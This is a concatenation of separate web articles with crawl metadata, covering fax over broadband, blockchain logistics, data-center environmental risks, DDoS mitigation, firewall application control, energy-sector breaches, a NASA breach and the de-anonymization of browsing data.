The problem rests is one of two matters or both. First is lossy” audio compression (codec). The second issue is “jitter”.
Why is lossy compression and jitter a problem for faxing? Understanding the mechanics so to speak of is the first step.
A fax is typically two fax machines communicating passing image data from the sender to the recipient.
This type of data being digital must be modulated to communicate the data over audio lines “channels” such as a phone line. The key is that the audio signal is converted into an audio wave and then decoded at the receiving end.
This is the beeping and screeching you hear when a fax tone is audible.
So one machine is basically for lack of better words talking and the other is listening.
Now that we have the basics, what is lossy compression and jitter and how does it affect broadband fax machine calls?
When the data is sent it must be compressed. Compression is when a string of data is taken and then converted into a smaller string. On the other end this compressed data must be decompressed so that the information can be retrieved.
The varied compressing of audio data is called “codecs”. Some codecs are called “lossless” which means that there is no loss in detail of the data when undergoing the compression and decompression exchange.
Others are called “lossy” which means that there is some loss of detail information when undergoing the compression and decompression stages; basically detail is sacrificed in order to achieve a tighter compression.
So it is obvious then that faxing cannot happen reliably without issues on lossy codecs because it will consistently remove data. So you have to go with a lossless channel which does use more bandwidth than a lossy one.
The most common means of transport used in the industry is called T.38, the issue is that T.38 was devised for transmission/termination over a closed controlled lossless environment and when it is used over an environment like the open internet, WiFi, or satellite they lossy nature of this medium makes it a very unreliable means of fax transport. But for years this was the only alternative.
One of the results of using T.38 on broadband channels is an event known as “jitter” resulting in:
Message signal interruption.
Loss of Synchronization
Broken signal data
During a broadband call the audio data is streaming between the machines. This data is called “packets”; each packet has the data sent over the internet indicates who sent it and where it should go. While being sent over the internet the data must take what is called “hops” through each station that can potentially send the packet through a different route to reach the final destination.
It is not uncommon that a station is unable to handle a packet at any given time. Resulting in delay of the packet routing. In addition depending on what type of packet the sender used, a station can even ignore and not relay the packet at all.
Broadband like a large percentage of “streaming” communication, using the type of packet that the internet stations have the discretion to ignore. This is done to keep the audio from pausing at various points and to keep the audio as real-time.
This typically works out perfectly fine for voice audio because the human ear does not pick up on the missing audio. And some Broadband equipment, noticing the missing audio, will even synthesize some audio to fill in the gap (this is called a “jitter buffer”). However, both missing and synthesized audio constitute a corruption of the audio data from when it left
the sender, and there is no immediate way for the receiver to recover the missing audio data. This is why the jitter you see represented shows up as gaps of silence.
An intelligent jitter buffer like T.38 uses will help to fill in the gaps enough to prevent premature detection of a signal end, however, there still will be missing audio. This missing audio is still makes it difficult for fax to work over Broadband. The other issue is the increased bandwidth that has to be used to maintain this buffer.
Which means your provider up sell you to use more bandwidth in the business world this translates into more overhead and less cash at the end of the day in your pocket.
Another issue is that fax machines use an error correction method (ECM) to request, retransmit, and recover any image data that did not make it through. But because of the inherent nature of ECM and the potential to disrupt T.38 most T.38 installs recommend that this valuable feature be turned off on the machine.
HTTP(S) is the cure?
HTTP(S) uses a request-response paradigm that works well with the distributed nature of the Internet, as a request or response might pass through many intermediate routers and proxy servers. Also a request includes not only the requested content but also relevant status information about the request. This self-contained design allows intermediary servers to perform value-added functions such as load balancing, caching, encryption, and compression.
This means that HTTPS ensures secure and reliable last mile connectivity for fax machines and servers when faxes are being transferred over the Internet.
HTTP(S) uses chunked transfer encoding which allows a server (our in our case a specific Fax ATA to our cloud) to maintain an HTTP persistent connection for dynamically generated content. Chunked encoding has the benefit that it is not necessary to generate the full content before writing the header, as it allows streaming of content as chunks and explicitly signaling the end of the content, making the connection available for the next HTTP request/response. This means that packet loss does not affect HTTPS transfer.
As such HTTPS suffers from none of the issues t.38 has with the open Internet. Latency, packet loss, jitter and congestion simply do not interfere with HTTPS packets as they do with T.38.
by Randy Simmons, FaxSIPit VP of Sales | <urn:uuid:5b93eee1-857b-43f5-9eed-6ba70599b514> | CC-MAIN-2022-40 | https://www.faxsipit.com/2015/12/02/faxing-over-broadband-the-problem-the-cure/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334515.14/warc/CC-MAIN-20220925070216-20220925100216-00318.warc.gz | en | 0.944156 | 1,389 | 2.6875 | 3 |
As online retail continues to grow. So does the need for better reverse logistics to handle the influx of customer return. A recent report from Cerasis, a leading transportation management company, found the costs of reverse logistics exceed $750 billion per year, with up to 30 percent of all products ordered online being returned.
While the return process varies widely across different retailers and industries, the overall product returns are simply too burdensome to consumers who are paying shipping costs and to retailers who are picking up all other charges, only to then try and charge the supplier.
Cerasis’ report takes a look at how applying blockchain technology to reverse logistics may be able to reduce some of these costs and enhance customer experience. According to the report, reverse logistics can cut into retailers’ profits by as much as 20 percent. It also states retailers can reclaim up to 32 percent of the total product cost by having an effective reverse logistics function which allows for possible reselling the item, recycling it or remanufacturing it.
“The road to better reverse logistics is not always clear, and supply chain leaders need to understand a few best practices for implemented combined blockchain and reverse logistics strategies,” the report said.
The report states integrating supply chain systems into a single platform can provide a combined approach to managing product lifecycles from procurement through reclamation, recycling and disposal. While the benefits of blockchain technology are still being explored within the supply chain, there are several direct applications Cerasis believes will be worthwhile.
Blockchain allows for better tracing and transparency of a product’s full lifecycle from the manufacturer’s sourcing of component materials to final disposal. When this traceable chain of custody is certain, it can make for faster product recalls, which is one application Walmart has tested for the past couple of years. As explained in a Technavio Report, blockchain technology can enhance the flow from information in reverse logistics, helping manufacturers understand the full cycle of their products, even after disposal.
Reverse logistics with blockchain applications can also ensure products such as smartphones and other electronics are disposed of without compromising risks to the former users who may still have personal information on those devices. Recycling and refurbishing electronic products are a growing segment of retail and when blockchain transparency is used to track products through their life cycles the stored personal information can not only be safeguarded but removed without compromise as well.
Retailers using blockchain applications to track returns and initial orders will likely increase consumer trust, even when the customers are business-to-business purchasers, the report stated. Blockchain also helps eliminate fraud and counterfeit products which are more likely to occur with online purchases.
The report also suggests retailers use blockchain technology in managing returns to make those efforts visible to consumers. Since 67% of shoppers check return policies before making a purchase, this will aid in selling more product and creating hassle-free returns policies.
Blockchain can enhance returns management by providing a means of tracking returns and also identifying issues contributing to the higher-than usual returns rates. | <urn:uuid:ee3cbdfd-3d7f-4c22-a31f-83ef38f06097> | CC-MAIN-2022-40 | https://hobi.com/blockchain-implications-on-reverse-logistics/blockchain-implications-on-reverse-logistics/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00318.warc.gz | en | 0.946716 | 615 | 2.53125 | 3 |
Data center maintenance is commonly thought of as an internal process. While a large number of a data center’s success happens indoors, there are certain external events that can deter a data center’s operation. Here are two environmental threats to data centers:
- Temperature changes
- During the summer months or other unusually hot times of the year, data centers can come to a halt. Data centers already generate heat without help from the outside environment, so in hotter months, the combination of heat can be fatal towards center operations. Temperature related using an environmental monitoring system that issues alarms or warnings when a sudden temperature change poses a threat. Another issue of monitoring temperature changes is monitoring airflow. Although diligent air conditioning keeps the center cool, it does not always guarantee proper airflow. Using fans for airflow decreases any static electricity or dust buildup between devices.
- Humidity and water accumulation are often overlooked when thinking of external threats, but can be the most deadly. Even when a center seems secure from any external water, water can accumulate through condensation or humidity in warmer climates. Water accumulation leads to overall corrosion and degradation of devices and their corresponding cables. Conversely, a data center with too little humidity has higher levels of electrostatic discharge. For this reason, it’s encouraged to heavily monitor centers’ humidity and to maintain the area’s humidity between 20 and 80 percent. Properly monitoring water build up near air conditioning units, pipes and underneath floorboards can save time, money and potential device loss. To monitor any potential water build up, sensors should be placed low to the ground in vulnerable areas.
Monitoring all aspects of a data center may be time consuming, but with diligence and patience external threats can be eliminated. The main key to protection from external threats is to focus on the big picture. When data center managers become too focused on internal threats, external threats can sneak up and wreak havoc on a successful system. | <urn:uuid:bae18ca8-e75c-4006-9719-203b1f5e6d6b> | CC-MAIN-2022-40 | https://hobi.com/two-environmental-threats-to-data-center-success-and-how-to-avoid-them/two-environmental-threats-to-data-center-success-and-how-to-avoid-them/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00318.warc.gz | en | 0.907692 | 395 | 2.875 | 3 |
SOAP Web Service command
Use the SOAP Web Service command to access and exchange information over the internet.
The Web Service command is used to implement SOA (service-oriented architecture) over the internet, so that multiple clients can consume web services through the Web, irrespective of the type of applications or platforms. By using this command, users can:
- Consume reusable application components as services, such as currency conversion, weather reports, and language translation.
- Connect to different existing applications and different platforms, irrespective of any underlying infrastructure requirements.
The Automation Anywhere Web Service establishes complete inter-polarity between clients/applications and the Web, supporting XML-based open standards, such as WSDL (Web Services Description Language), SOAP (Simple Object Access Protocol), and UDDI (Universal Description Discovery and Integration). | <urn:uuid:5a85be29-2125-4abe-97b5-70da030196ca> | CC-MAIN-2022-40 | https://docs.automationanywhere.com/es-ES/bundle/enterprise-v11.3/page/enterprise/topics/aae-client/bot-creator/commands/soap-web-service-command.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00318.warc.gz | en | 0.832977 | 176 | 2.734375 | 3 |
The world continues to ramp up its technological footprint, which in turn creates more ways to access the Internet of Things (IoT) from home and work.
More technology inevitably leads to more technological threats looking to take advantage of holes in network infrastructure.
“Globally, there was a 776% growth in attacks between 100 Gbps and 400 Gbps Y/Y from 2018 to 2019, and the total number of DDoS attacks will double from 7.9 million in 2018 to 15.4 million by 2023,” according to Cisco’s Annual Internet Report (2018-2023).
For a bad actor with a vengeful motive, a DDoS attack can be very attractive because it is very inexpensive.
It’s as simple as searching Reddit for instructions to access the Dark Web, use Bitcoin to spend $5.00-$20.00 on a DDoS attack with a 4-hour to 8-hour duration. This type of attack can easily take a cable modem offline.
Despite the low barrier of entry, a DDoS attack of this size lacks scale, and it will not be strong enough to take down a larger target, like a service provider or operator.
As a business leader, you’re probably wondering how you can mitigate this situation from happening at your company.
As a solution provider, preparing and protecting companies from cyber threats is something CCI Systems does every week.
We regularly perform network assessments to find weaknesses and areas where networks could be exploited. Plus, we can assist in any mitigation technique.
Understanding what a DDoS attack is, how mitigate it, and how to protect against it are all pieces of knowledge you will want to have as a service provider.
What Is a DDoS Attack?
A distributed denial of service (DDoS) attack is a flood of malicious internet traffic aimed at a specific website, service, server or IoT device to take it offline. This attack is the equivalent of a clogged drain where nothing can get through the blockage.
There are two main types of attacks:
A volumetric-based attack is the most common, essentially pushing more volume down your pipes than the network can handle. Think small devices sending small amounts of data, but those devices are sending hundreds of thousands.
Say you’re an avid gamer, you love playing online, and you livestream on Twitch. One night, another user gets upset and wants revenge after a loss. They quickly launch a volumetric attack at your router to kick you off stream.
This attack knocks out your internet feed until your provider takes measures to block the traffic and restore service.
An application-based attack is meant to target specific service-based applications, oftentimes servers. The bad actor may attack the DNS server with too many requests (or queries) to make it unreachable and affect the service.
The goal is to take out a very specific service, not a link or network.
Either attack can be detrimental to a network, so it’s important to understand why you should prepare to defend against both.
Why Would You Want to Avoid a DDoS Attack?
Internet usage and connectivity are affected by either type of DDoS attack, whether you’re a consumer streaming Netflix at home or a service provider serving thousands of end users with internet connected devices.
The business implications can become serious if a service provider is hosting services.
When attacked, the end users will not be able to get online if they’re forced to shut down their server. If they do not have to fully shut down the service, in any event, the internet usage will be severely degraded.
Consider the implications of a 10-gigabyte attack, which although it is uncommon, an attack of this size going into a small city or municipality could take out an entire town.
An attack of this magnitude can have a huge financial impact on a company.
The fallout consists of a failed customer experience. The loss of reputation from the end users posting negative reviews on Google, Facebook, Reddit, or Twitter can happen at a rapid pace.
Abruptly going offline can have a big impact on income and customer satisfaction.
Protecting your reputation and customer experience as a service provider should be the #1 priority.
What are the stats?
The average global attack duration is 39.83 minutes, according to DDoS Global Attack Trends via NETSCOUT.
For service providers, it is easiest to mitigate a DDoS attack with a phased approach. Mitigation can be as simple as identify, react, and scrub.
1. Attack Identification
The first way to mitigate a DDoS attack is knowing what your traffic is.
Buying a service or software that monitors and does automated configuration and DDoS mitigation without scrubbing the network is going to be the cheapest route. However, this is not always the most efficient.
Monitoring software catches the majority of attacks, but your employees or technicians will be required to sit and monitor the monitoring software.
Do you know what is on your network? Can you identify patterns or characteristics your technicians deem as normal? What is the typical volume on a Tuesday evening?
Determining and documenting volumes will help mitigate an attack before it takes down your network or before an end user even knows anything has happened.
By monitoring these trends, if there is an unusual push of traffic, it will be easy to identify and mitigate. Having full visibility of your network and what’s on your network will keep it safe and less prone to attacks exploiting vulnerabilities.
Simply, you need to analyze the traffic to know your network is being attacked.
2. Remote Triggered Black Hole (RTBH)
When using a remote triggered black hole, any traffic coming into an attacked device from outside the network will be dropped.
This isn’t to say everything on the inside of the network is going to be offline, but everything on the outside of the network will be cut off.
This black hole is called a “null route” on the router syntax. The technician will be routing to null-zero. Null-zero is a logical interface on the device(s) that goes nowhere.
One way to implement a RTBH is with BGP Flowspec. This allows a technician to deploy filtering functionality quickly over a large number of BGP (border gateway protocol) peer routers.
Companies frequently use this software solution manually because of the impact created across the network, if you are not selective.
Identifying what is being affected and knowing what those devices or network components are will be important to some companies, dependent their business models and service to their end users.
3. Scrubbing Services
If your company is offering a service utilizing scrubbing, it's called a clean pipe service. The scrubbing ensures the bad traffic goes away, and the good traffic is still there.
To keep your end users happy, the services will still be available, the host being attacked will remain online, until you hit a certain volume threshold. If the threshold is reached, you throw the flag and fall back to the remotely triggered black hole.
In the case of a failure, the primary purpose becomes protecting the network. It's not about the host anymore, and you wait for the attack to subside.
Let’s say a fast-food restaurant is waylaid with a volumetric DDoS attack over lunch.
The restaurant uses a third-party credit card processing service for online orders, and they do have DDoS detection software in place without a scrubber.
The attack creates a flood of credit card purchases but blocking this attack with the software causes the network to be shut down temporarily.
This protects the rest of the network from corruption, but it also inhibits the function of your restaurant during its busiest time of day.
Scrubbing Your Network Will Pay Off
The payout between scrubbing and not scrubbing and understanding the inherent risks involved will be crucial in the decision-making process.
Bigger companies will have contracts where they do not have the option of network outages or attacks that compromise their reliability or take them offline.
These larger organizations tend to be more proactive in their approach, rather than reacting to attack after attack and deciding reactivity may not be the best solution.
By getting a piece of software in place to trigger the automation, the customer will be better protected from a DDoS attack without having to purchase a scrubber or high-end solution.
Keeping your network up and running, as well as keeping your customers happy can make all the difference.
Define the Path of DDoS Mitigation
After finding a solution to fit your company’s initiatives against DDoS attacks, it will be time to decide what the plan is, i.e., where to go or who to go with.
Some companies want to go the route of running an open-source tool that determines the bandwidth is spiking. A technician receives a text alert (or notification) and they manually shut down the attack.
A manual override can work well for many companies, but each company is different, and networks vary.
If your company needs scrubbing services, a great fit may be Arbor DDoS.
If protecting your network is the primary goal, Kentik has an outstanding traffic analysis platform.
Whatever you choose, teaming up with a solution provider, like CCI Systems, can be a great place to start.
CCI can temporarily point cloud-based applications toward a customer’s network, so they can get a view of what the software looks like with their traffic. CCI also offers options where messages can be automatically sent upstream to block the traffic during an attack, like BGP Flowspec. | <urn:uuid:68a51455-06d2-4402-aa91-29a3ab0e1650> | CC-MAIN-2022-40 | https://www.ccisystems.com/blog/mitigate-protect-ddos-attacks | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00318.warc.gz | en | 0.933469 | 2,031 | 2.828125 | 3 |
Many cyberattacks can be subtle, and high-level network visibility may not be enough to protect against data breaches and other attacks. Application control, a system designed to uniquely identify traffic from various applications on a network, enables an organization to define and apply extremely granular security and network routing policies based upon the source of a particular traffic flow. As a result, it can prevent unauthorized applications from acting in ways that pose risk to the organization.
Application control works by matching different types of network traffic to predefined models. In order for computers to talk to one another, their traffic needs to conform to certain standards. Knowledge of these standards enables application control to differentiate one type of traffic from another.
After a particular traffic flow as been identified as belonging to a certain application, it can be classified in a number of ways:
After a network traffic flow has been assigned to a particular application and set of categories, policies can be applied based upon those assignments. This grants an organization a high level of visibility and control over its network infrastructure.
Without application control, an organization is limited to defining policies based on features such as IP addresses and port numbers. While these can help to identify the application producing a traffic flow, there is no guarantee of correctness. The use of standard port numbers for certain applications is a convention, not a rule.
With application control, network traffic is identified by matching packets to known models of how different applications’ traffic is structured. This identification is more accurate and enables an organization to see the mix of traffic within their network. This level of visibility can also be applied in a number of different ways and provides several benefits to an organization:
Application control is a security technology built into some next-generation firewalls (NGFWs) and secure web gateways (SWGs). The ability to uniquely identify the application that created a particular traffic flow provides a number of different network performance and security benefits to an organization.
Application control is only one of several features that should be included in a NGFW. For more information on what to look for, check out this firewall buyers’ guide. Then, contact us for more information about Check Point’s firewall options and schedule a demo to see how a NGFW with application control provides more effective protection against cyber threats. | <urn:uuid:84164608-810e-4ffb-ae9a-00cedaf11c24> | CC-MAIN-2022-40 | https://www.checkpoint.com/cyber-hub/network-security/what-is-application-control/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00318.warc.gz | en | 0.939824 | 465 | 2.5625 | 3 |
The metaphors of technology
Societies tend to understand what it is to be human in terms of the technology they use every day. For example, when mechanical clocks were invented, the universe started looking like a grand clockwork. When steam engines transformed industry, we started understanding our psyches in terms of various pressures, and we started to talk about "venting." In the age of computers, we have inputs, process information and produce outputs.
As with any metaphor, there is the danger that we'll draw inappropriate conclusions based on the model. For example, there's at best conflicting evidence that "letting off steam" actually lowers the likelihood of committing violence as opposed to putting one more in the mood for it; soccer hooligans spring to mind.
The computer model also can easily lead us astray. For example:
We sometime think that we can control human "output" by controlling the inputs--"garbage in, garbage out," as the computer saying goes. But humans aren't that deterministic, or at least the causal factors are so many and so varied that we can't predict them with the reliability of billiard balls on a collision course. Otherwise, everyone who listened to a Judas Priest album would be up on the stand with the morons who claimed that heavy metal turned them into murderers. The computer model of consciousness "dumbs down" our understanding of human motivation. In fact, motivation is profoundly different from causation.
Similarly, the computer model might lead us to think that we're programmed. But such a belief would have us "dumb down" our educational system, substituting programming for teaching, and being programmed for learning.
Finally -- although there are many other possible examples--computers may model rationality (they don't, actually), but they sure don't touch emotion. The computing metaphor treats emotion as a mere epiphenomenon, an accidental byproduct like the heat generated by a TV set. As "information" appliances, computers are already biased against emotion, preferring a "just the facts, ma'am" world. But emotions are about what things mean to us and thus enable information to matter. They are the engines of personhood, not a byproduct.
Now for the hard part. Suppose for the moment that the Web is as defining of the coming age as the steam engine and computers were of theirs. How are we going to understand ourselves in light of the Web? We can already begin to hear ourselves thinking of a memory lapse as a "broken link." Will we view ourselves as loosely bound, full of play? Will we replace our view of our self as an M&M with its value hidden inside a hard shell, with a sense that we get our value from our outward-bound involvement with others?
Give me a call in a hundred years and let me know ... | <urn:uuid:12ce0b59-70a7-4786-a7d0-34a852500108> | CC-MAIN-2022-40 | https://www.kmworld.com/Articles/Columns/Perspective-on-Knowledge/The-metaphors-of-technology-9728.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00518.warc.gz | en | 0.96394 | 578 | 2.96875 | 3 |
In any industry, cybersecurity threats lurk around every corner. Cybersecurity breaches are costly. In 2021, the average cost of a cybersecurity data breach was $4.24 million, and can substantially damage a company’s reputation in addition. Among 17 industries surveyed by IBM, the energy sector has the fifth-highest average cost associated with a data breach, trailing only the healthcare, pharmaceutical, financial, and technology industries. With security vulnerabilities in the energy sector only increasing as more and more systems move online, many providers are considering updating their cybersecurity measures in order to avoid falling prey to attackers.
The good news is that energy providers have options for reducing both the likelihood and impact of a potential data breach. Comprehensive cybersecurity measures don’t just consider one layer of the software supply chain or address a single point of failure in isolation. Instead, they view a system and all of its parts in context, considering no vulnerability too small to address, and no system too big to secure.
In the past few years, a number of high profile cybersecurity breaches have plagued the energy sector. Here are a few situations that may have been proactively avoided by setting more comprehensive measures in place ahead of time.
Colonial Pipeline Ransomware Attack
In May 2021, the 5,500-mile Colonial Pipeline, which brings oil from the Gulf of Mexico to the East Coast, fell victim to a ransomware attack. A hacker group identified as DarkSide gained access to the Colonial Pipeline network and gathered 100 gigabytes of data in two hours. The hackers then left ransomware on computers throughout the network, demanding cryptocurrency.
Unsure of the full extent of the situation, officials shut down the Colonial Pipeline in order to contain the possible threat to national security. They also contacted the Departments of Energy and Homeland Security, the FBI, and the Cybersecurity and Infrastructure Security agency. Then, they paid the hackers in order to access the decryption key. On May 12, the pipeline resumed operations as normal, but not before producing oil shortages all over the East Coast.
Cybersecurity firm Mandant found that the hackers had gained access to the Colonial Pipeline network through a leaked password. The password granted access to the pipeline’s virtual private network (VPN), through which hackers were able to steal data and distribute ransomware. The source of the initial breach is unknown, but Mandant has said it’s likely the password had been used by an employee for another website, allowing hackers to infer the employee’s password on the pipeline’s systems. The Colonial Pipeline incident is the largest-ever publicly disclosed cyberattack against U.S. infrastructure.
Pacific Gas and Electric Fined 2.7 Million Dollars
Smart meters, which transmit energy usage data via radio waves or the Internet, have brought with them a new set of security risks. San Francisco energy company Pacific Gas and Electric (PG&E) was recently fined $2.7 million by federal security regulators for a leak of confidential data associated with their smart meters.
The company allegedly lost control of over 30,000 pieces of information through their third-party contractor, when that contractor copied information from PG&E’s network to its own network. The contractor’s network was hosted publicly online, and did not require a login to access. PG&E initially claimed the data was fake — dummy information generated to test a data storage system — but later reversed this claim.
Cybersecurity Breaches Require Multiple Points of Failure
In both of the above case studies, multiple points of failure interacted to bring about a disaster. The Colonial Pipeline oil shortage mIgor have been prevented if employees had been trained never to reuse passwords, or if employees knew how to deflect phishing attacks (even those targeting personal accounts not related to their work). Alternatively, the crisis may have been averted if the fate of the entire system weren’t resting on the security of a single VPN, or if surveillance measures were in place that gave authorities a better sense of exactly which systems had been accessed, so that they would know whether or not shutting down the whole pipeline was necessary.
Similarly, PG&E could have collaborated with third parties in a manner that did not require such extensive data sharing, used smart meters in a way that did not require the use of third parties, or foregone smart meters altogether. Another solution might have been to brief third parties more thoroughly on when (or when not) to duplicate data. PG&E also could have conducted a more thorough investigation of the nature of the data before releasing their initial statement, to avoid falsely claiming the data itself was fake. Any of these solutions could have been prevented or, at the very least, mitigated the damage associated with these data breaches.
Online Cybersecurity Requires a Holistic Approach
With these and other security risks, the threats do not arise from a single point of failure. Instead, each threat results from the compounding of different weaknesses and vulnerabilities. Security threats can emerge from failures in a system’s internal development, the conduct of its users, or its relationship with a third party. Energy sector security depends on proactive attention to detail on all sides of a company and its collaborators’ operations.
Effective online security is an essential tool for energy providers looking to prevent the kinds of attacks suffered by the Colonial Pipeline or PG&E. Kiuwan provides essential security services that ensure the safety of an energy provider’s code and online systems.
Kiuwan Can Help Mitigate Cybersecurity Risks
Kiuwan’s unique development, security, and operations (DevSecOps) approach highlights the importance of considering a system’s security holistically. No vulnerability is considered in a vacuum. Rather, Kiuwan recognizes and tends to the fundamentally integrated nature of energy security.
Threats to energy cybersecurity always depend upon exploiting multiple points of failure. In order to mitigate these threats, energy providers need a cybersecurity team that sees the big picture.
Kiuwan’s advanced cybersecurity services include robust tools, like s oftware composition analysis (SCA) and static application security testing (SAST), that analyze and identify potential vulnerabilities in code security.
Kiuwan’s services provide extensive and digestible reviews of every step in the software supply chain, and deploy powerful solutions to counteract the most common cybersecurity threats. Contact Kiuwan for a free demo. | <urn:uuid:2a1169e9-4609-4b8a-89c0-cd5fde7e0e77> | CC-MAIN-2022-40 | https://www.kiuwan.com/application-security-for-energy-providers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00518.warc.gz | en | 0.943288 | 1,301 | 2.6875 | 3 |
The role of architecture in IT
When you are considering IT Architecture I don’t think that anybody would argue with the statements that:
- Requirements are the input for design activities that result in a design of an Object
- Design is the input for construction activities that result in an Object that conforms to Requirements
But where does Architecture fit into the picture? Whereas the artefacts Requirements, Design and Object are clearly demarcated and sequentially interrelated, the relationship between Architecture and these other artefacts is more ambiguous.
To which degree is Architecture influenced by an Object’s Requirements? Where does Architecture stop and Design start? Is there a direct relationship between Architecture and Object or is Architecture translated into Design? These questions have puzzled and fascinated me for quite a while and although I haven’t been able to eliminate the ambiguity, I’ve now arrived an explanation that seem to work for me.
A useful definition
The most useful definition of Architecture that I could find was in the TOGAF 9.1 Management Overview (via www.togaf.info), adapted from ANSI/IEEE Standard 1471-2000:
“Architecture is the fundamental organization of something, embodied in:
- its components
- their relationships to each other and the environment
- the principles governing its design and evolution”
In other words, Architecture determines the type of Components that will be used to design (and evolve) something, and how they will be used. For instance: red bricks and oak beams will be used to design a Tudor style house. In this definition, Architecture and Design are separate artefacts.
The definition introduces the concept of Environment, which I interpret as the organizational context. An Architecture has been chosen because it’s effective for a particular organization. The Design of an Object within this Environment is informed by both the Requirements for the specific Object, and the generic Architecture that applies to all Designs in this Environment.
The irreversible part of design
Another helpful statement (I forget the source) is “Architecture is the practically irreversible part of Design”. I equate “practically irreversible” with financially prohibitive. Once a house has been built in Tudor style, that’s that. It would be cheaper to build a new house than to change a Tudor house to Bauhaus style. The ‘trouble’ with this statement is that Architecture seems to be part of Design. Apparently there is an architectural part of Design, and a non-architectural part but I can’t think of a name for the non-architectural part of Design.
This leads me to the following understanding:
- Architecture is determined by the characteristics of the Environment including reasonably expected long-term Requirements
- Architecture guides and confines the Design of Objects by determining both which types of Components may be used and how
I expect that my post-modernist friends will deride me for creating such a neat-and-tidy model but I hope that it’s food for thought. Comments most welcome, in particular which of these 4 Venn diagrams about the relationship between Architecture and Design seems right.
IT Architecture Definition
Architecture is the fundamental organization of something, embodied in: its components, their relationships to each other and the environment, the principles governing its design and evolution”. In other words, Architecture determines the type of Components that will be used to design (and evolve) something, and how they will be used. For instance: red bricks and oak beams will be used to design a Tudor style house. In this definition, Architecture and Design are separate artefacts. | <urn:uuid:8ecfe5e9-5d64-4a2a-83e7-ed254655b89a> | CC-MAIN-2022-40 | https://itchronicles.com/technology/illusion-architecture/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00518.warc.gz | en | 0.937817 | 758 | 2.734375 | 3 |
NASA revealed today that it was hacked earlier this year. In an internal memo sent to all employees, the agency said that an unknown intruder gained access to one of its servers storing the personal data of current and former employees. Social Security numbers were also compromised, NASA said.
The agency said it discovered the hack on October 23, almost two months ago. It is unclear why the agency waited nearly two months to notify employees, but it is common for US law enforcement to ask hacked organizations to delay notifying affected victims while they investigate an incident.
Commenting on the news, how NASA employees might be affected, and how the breach could have been avoided is Paul Walker, technical director at One Identity.
Expert Comments below:
Paul Walker, Technical Director at One Identity:
A keyword that is used in the NASA memo is the word “unknown.” Computer systems authenticate and authorise access to people and other “things,” such as other software, bots and machines. The trick here is to know what, or who, is requesting access and to what information are they requesting access to? The word “unknown” within the memo is worrying. Was this someone on the inside at NASA? Or was it a state actor from a potentially hostile foreign state? Who knows what the “unknown” hackers will do with the information but, given past breaches, it’s highly likely that it will end up for sale on the dark web. The affected NASA employees may find themselves at risk of social engineering, unwanted advertising or other potentially fraudulent risks.
If NASA had implemented basic advice from the National Institute of Standards and Technology (NIST) – who have a close relationship with various U.S. Government Administrations – then this breach may not have happened. As the NIST states, using MFA helps by adding an additional layer of security, making it harder for the bad guys to get in. With regard to the individuals that are requesting access, it’s all about risk mitigation. How confident are we that the person (or thing) requesting access is who they (or it) claims they are? Moreover, what are they doing with the access they’ve been given?
I would recommend that an organisation like NASA takes further action than simply implementing MFA on top of the usual password. For example, using a layered approach including password vaulting, automatic recording of access (including MFA) as well as real time behavioural analysis and alerting, would better protect NASA’s network, and employee data, from being compromised in the future.” | <urn:uuid:c948b06e-4cb4-4a67-b2b5-be41c158ffed> | CC-MAIN-2022-40 | https://informationsecuritybuzz.com/expert-comments/nasa-discloses-data-breach/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00518.warc.gz | en | 0.959556 | 531 | 2.609375 | 3 |
Tracking of our browsing behavior is part of the daily routine of internet use. Companies use it to adapt ads to the personal needs of potential clients or to measure their range. Many providers of tracking services advertise secure data protection by generalizing datasets and anonymizing data in this way.
Tracking services collect large amounts of data of internet users. These data include the websites accessed, but also information on the end devices used, the time of access (timestamp) or location information.
“As these data are highly sensitive and have a high personal reference, many companies use generalization to apparently anonymize them and to bypass data security regulations,” says Professor Thorsten Strufe, Head of the “Practical IT Security” Research Group of KIT.
By means of generalization, the level of detailing of the information is reduced, such that an identification of individuals is supposed to be impossible. For example, location information is restricted to the region, the time of access is limited to the day, or the IP address is shortened by some figures.
Strufe, together with his team and colleagues of TUD, have now studied whether this method really allows no conclusions to be drawn with respect to the individual.
With the help of a large volume of metadata of German websites with 66 million users and over 2 billion page views, the computer scientists succeeded in not only drawing conclusions with respect to the websites accessed, but also with respect to the chains of page views, the so-called click traces. The data were made available by INFOnline, an institution measuring the data range in Germany.
The course of page views is of high importance
“To test the effectiveness of generalization, we analyzed two application scenarios,” Strufe says. “First, we checked all click traces for uniqueness. If a click trace, that is the course of several successive page views, can be distinguished clearly from others, it is no longer anonymous.”
It was found that information on the website accessed and the browser used has to be removed completely from the data to prevent conclusions to be drawn with respect to persons.
“The data will only become anonymous, when the sequences of single clicks are shortened, which means that they are stored without any context, or when all information, except for the timestamp, is removed,” Strufe says.
“Even if the domain, the allocation to a subject, such as politics or sports, and the time are stored on a daily basis only, 35 to 40 percent of the data can be assigned to individuals.” For this scenario, the researchers found that generalization does not correspond to the definition of anonymity.
A few observations are sufficient to identify user profiles
In addition, the researchers checked whether even subsets of a click trace allow conclusions to be drawn with respect to individuals.
“We linked the generalized information from the database to other observations, such as links shared on social media or in chats. If, for example, the time is generalized precisely to the minute, one observation is sufficient to clearly assign 20 percent of the click traces to a person,” says Clemens Deusser, doctoral researcher of Strufe’s team, who was largely involved in the study.
“Another two observations increase the success to more than 50 percent. Then, it is easily obvious from the database which other websites were accessed by the person and which contents were viewed.” Even if the timestamp is stored with the precision of a day, only five additional observations are needed to identify the person.
